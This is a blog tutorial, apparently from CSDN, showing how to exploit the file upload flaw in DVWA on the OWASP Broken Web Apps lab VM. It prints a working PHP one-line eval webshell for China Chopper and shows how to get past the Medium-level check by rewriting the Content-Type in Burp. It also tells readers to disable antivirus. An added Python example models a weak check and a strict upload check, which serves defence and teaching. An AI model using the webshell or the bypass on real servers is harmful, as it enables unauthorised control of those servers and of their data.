Upload vulnerability: after reading this you are a hacker (China Chopper and Kali)

1. Experimental environment

Target VM: OWASP_Broken_Web_Apps_VM_1.2
Download
We need two tools: 中国菜刀 (China Chopper) and Kali. Turn off all anti-virus software first, otherwise China Chopper may be quarantined by it.
Principle

1. File upload is a feature that most web applications have, for example users uploading attachments, changing their avatar, or sharing pictures and videos.
2. Normal uploads are usually documents, images, videos and so on; the web application stores them in the backend after receiving them and returns them when needed.
3. If a malicious executable file such as PHP or ASP gets past the web application's checks and is executed successfully, the attacker has effectively obtained a webshell.
4. Once an attacker has a webshell, they can read the web application's data, delete web files, escalate privileges locally, and go on to take over the whole server or even the internal network.
5. SQL injection targets the database service, while a file upload vulnerability mainly targets the web service; in a real penetration test the two are combined to gain deep control of the target.

2. Low Security Level

First we start the target VM in our virtualization software and check its IP address:

root@owaspbwa:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
    link/ether 00:0c:29:b2:da:ea brd ff:ff:ff:ff:ff:ff
    inet 192.168.13.144/24 brd 192.168.13.255 scope global eth0
    inet6 fe80::20c:29ff:feb2:daea/64 scope link 
       valid_lft forever preferred_lft forever

After finding the IP, we open a browser and visit 192.168.13.144, then navigate to the DVWA upload page.
Upload the one-line shell we have written, a so-called 小马 (little horse).
The file contains only a single line, which is why it is called a little horse.
小马 (little horse): also called a one-line Trojan. The whole shell is only one line of code and usually just provides a way to execute whatever is sent to it.
大马 (big horse): has far more code and functionality than the little horse, and is usually encrypted so that security firewalls and intrusion detection systems do not recognise it.

<?php @eval($_POST['yjssjm']);?>
Do not change the format; only change what is inside the quotes. yjssjm is the password you define, and it simply has to match the password you enter in China Chopper below.

Then we go to the target VM, look at the upload directory and create a test file:

root@owaspbwa:~# cd /owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# ls
shell.php
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# echo 'aaaa' > a.txt   # create a test file
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# ls
a.txt  shell.php

After configuring the connection in China Chopper (URL of the uploaded shell and the password), we double-click the entry to open it.
We delete a.txt through China Chopper, then check on the server and find that a.txt has been removed there: this is what exploiting the upload vulnerability looks like.

3. Medium Security Level

We switch DVWA to the Medium security level and upload again; this time we find that the upload fails.
This time we need to use Kali as a proxy: intercept our upload request, change the type in it, and then forward it on.
Open Kali; the default username is root and the password is toor.
Then we keep clicking through in the bottom right corner: I Accept, then Next, then Start Burp.
Then we need to set up the browser proxy so that all requests go through 192.168.13.145 (the Kali machine).
Then we upload again; this time Burp on Kali shows the request we just sent, and we edit the type before forwarding it.
Looking at DVWA, we see the upload succeeded.
Next, exactly as above, we can connect to the server with China Chopper.
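Why the Medium level falls to a proxy edit while a properly written handler does not, as an added example in Python (not code from this post or from DVWA): weak_check() models a check that trusts only the client-supplied Content-Type and size, strict_check() ignores the header and validates the extension, the magic bytes and the content. The sample bytes are constructed; the one-line shell is the one shown above.

```python
"""Model of the two kinds of server-side upload check (added example)."""
import re

# Constructed samples; a minimal PNG header stands in for a real image.
ONE_LINER = b"<?php @eval($_POST['yjssjm']);?>"
POLYGLOT = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + ONE_LINER   # JPEG header + PHP
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR"

# Allowed extensions mapped to the magic bytes the file body must start with.
ALLOWED_EXT = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
               "png": b"\x89PNG\r\n\x1a\n"}
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.I)   # <?php ... or <?= ... open tags


def weak_check(filename, content_type, data, max_size=100000):
    """Content-Type-only check.  The header is part of the multipart body the
    client sends, so an intercepting proxy can set it to anything."""
    return content_type in ("image/jpeg", "image/png") and len(data) < max_size


def strict_check(filename, content_type, data, max_size=100000):
    """Return (accepted, reason).  content_type is deliberately unused."""
    if len(data) >= max_size:
        return False, "too large"
    if "." not in filename:
        return False, "no extension"
    ext = filename.rsplit(".", 1)[1].lower()
    magic = ALLOWED_EXT.get(ext)
    if magic is None:
        return False, "extension .%s not allowed" % ext
    if not data.startswith(magic):
        return False, "content is not a %s image" % ext
    if PHP_TAG.search(data):           # image/PHP polyglot
        return False, "embedded PHP code"
    return True, "ok"


if __name__ == "__main__":
    cases = [("shell.php", "application/x-php", ONE_LINER),
             ("shell.php", "image/jpeg", ONE_LINER),   # header changed in a proxy
             ("cat.jpg", "image/jpeg", POLYGLOT),
             ("cat.png", "image/png", PNG_STUB)]
    for name, ctype, body in cases:
        print("%-10s %-18s weak=%-5s strict=%s" % (
            name, ctype, weak_check(name, ctype, body), strict_check(name, ctype, body)))
```

A real handler should additionally rename the stored file to a random name with the allowlisted extension and keep the upload directory outside the web root or with script execution disabled.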
If any of you had trouble downloading China Chopper or Kali, you can leave your e-mail address in the comments section.
Everyone should try this on their own computers as far as possible; if it causes any financial loss, I take no responsibility.


Origin blog.csdn.net/baidu_38803985/article/details/105375025